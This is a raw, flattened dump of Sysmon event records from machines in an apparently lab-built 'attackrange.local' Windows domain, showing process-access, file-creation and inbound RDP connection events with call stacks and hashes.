14:59:07.465{A7A01FEF-EC3B-607E-680F-00000000BB01}13164064C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000081544Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:07.356{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31DFC08D167C151A0399935209B132F5,SHA256=EC8A2DE735320B68548130AD0D2A257E0C519A16FC84BC894049921CD6CF26A9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081543Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:07.294{A7A01FEF-E380-607E-510A-00000000BB01}63405272C:\Windows\system32\conhost.exe{A7A01FEF-EC3B-607E-680F-00000000BB01}1316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081542Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:07.294{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081541Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:07.294{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081540Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:07.294{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081539Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:07.294{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081538Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:07.294{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC3B-607E-680F-00000000BB01}1316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081537Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:07.294{A7A01FEF-E37F-607E-4D0A-00000000BB01}59884344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{A7A01FEF-EC3B-607E-680F-00000000BB01}1316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000081536Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:07.154{A7A01FEF-EC3B-607E-680F-00000000BB01}1316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000081535Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:05.218{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-59434-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000050738Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:04.910{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-52428-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050737Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:07.037{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4BC195D6C16EB440BF74337E49BE031F,SHA256=130875A41F68C40CDEF587587492EF3A1E39C46206555E899DB6C0CD4D8884A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081634Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.981{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=42A9828798CF0A33B1417E8B38B1E8ED,SHA256=DBF77ABD7FEC6CFF4987F2498B0F71AA0F44C7ABD71A7DC9BE5730689B11EA6F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081633Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.981{A7A01FEF-EC23-607E-A70E-00000000BB01}944NT AUTHORITY\NETWORK SERVICEC:\Windows\system32\sppsvc.exeC:\Windows\System32\spp\store\2.0\tokens.dat.bakMD5=0773D5CAD4EB3918D0ABF85A80604F97,SHA256=75E10750E8C7CDD25D659EECEAB7E8A8A66786BF0308A529FB5A6F9F2222879F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081632Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.575{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81cf7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BAF6E5)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BFF145)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x800000000000000081631Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.575{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81b7d|C:\Windows\System32\SHELL32.dll+82223|C:\Windows\System32\SHELL32.dll+82154|C:\Windows\System32\SHELL32.dll+81a02|C:\Windows\System32\SHELL32.dll+836c0|C:\Windows\System32\SHELL32.dll+835ed|C:\Windows\system32\explorerframe.dll+29e56|C:\Windows\system32\explorerframe.dll+c7e6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\USER32.dll+148bf|C:\Windows\System32\USER32.dll+2e967|C:\Windows\System32\USER32.dll+2e813|C:\Windows\System32\USER32.dll+2e6b2|C:\Windows\System32\USER32.dll+2e648|C:\Windows\System32\comdlg32.dll+13ae4|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+15a0a7|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+159b88|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+1f9da1|C:\Program Files\Microsoft Office\root\Office16\ppcore.dll+249657 10341000x800000000000000081630Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.575{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81af9|C:\Windows\System32\SHELL32.dll+82223|C:\Windows\System32\SHELL32.dll+82154|C:\Windows\System32\SHELL32.dll+81a02|C:\Windows\System32\SHELL32.dll+836c0|C:\Windows\System32\SHELL32.dll+835ed|C:\Windows\system32\explorerframe.dll+29e56|C:\Windows\system32\explorerframe.dll+c7e6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\USER32.dll+148bf|C:\Windows\System32\USER32.dll+2e967|C:\Windows\System32\USER32.dll+2e813|C:\Windows\System32\USER32.dll+2e6b2|C:\Windows\System32\USER32.dll+2e648|C:\Windows\System32\comdlg32.dll+13ae4|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+15a0a7|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+159b88|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+1f9da1|C:\Program Files\Microsoft Office\root\Office16\ppcore.dll+249657 10341000x800000000000000081629Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.575{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81add|C:\Windows\System32\SHELL32.dll+82223|C:\Windows\System32\SHELL32.dll+82154|C:\Windows\System32\SHELL32.dll+81a02|C:\Windows\System32\SHELL32.dll+836c0|C:\Windows\System32\SHELL32.dll+835ed|C:\Windows\system32\explorerframe.dll+29e56|C:\Windows\system32\explorerframe.dll+c7e6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\USER32.dll+148bf|C:\Windows\System32\USER32.dll+2e967|C:\Windows\System32\USER32.dll+2e813|C:\Windows\System32\USER32.dll+2e6b2|C:\Windows\System32\USER32.dll+2e648|C:\Windows\System32\comdlg32.dll+13ae4 10341000x800000000000000081628Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.575{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81add|C:\Windows\System32\SHELL32.dll+82223|C:\Windows\System32\SHELL32.dll+82154|C:\Windows\System32\SHELL32.dll+81a02|C:\Windows\System32\SHELL32.dll+836c0|C:\Windows\System32\SHELL32.dll+835ed|C:\Windows\system32\explorerframe.dll+29e56|C:\Windows\system32\explorerframe.dll+c7e6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\USER32.dll+148bf|C:\Windows\System32\USER32.dll+2e967|C:\Windows\System32\USER32.dll+2e813|C:\Windows\System32\USER32.dll+2e6b2|C:\Windows\System32\USER32.dll+2e648|C:\Windows\System32\comdlg32.dll+13ae4|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+15a0a7 23542300x800000000000000081627Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.497{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E675DF8BAEF69FCBE46EB34A503E0F8C,SHA256=89DF90D4CEB3C19469CCC5422425893A34DFCC63B9FE2B8A75AB9C16D622446E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081626Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.465{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7FA533294F4FAECF462EA209D5B83275,SHA256=C9545A0E5B910A82995B8BD0DEF69F43613D76E505BFAFF0D182E576B1E041A6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081625Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.372{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81cf7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BAF6E5)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BFF145)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x800000000000000081624Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.372{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81cf7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BAF6E5)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BFF145)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x800000000000000081623Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.372{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81cf7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BAF6E5)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BFF145)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x800000000000000081622Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.372{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81cf7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BAF6E5)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BFF145)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x800000000000000081621Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.372{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81cf7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BAF6E5)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BFF145)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x800000000000000081620Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.372{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81cf7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BAF6E5)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BFF145)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x800000000000000081619Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.372{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft 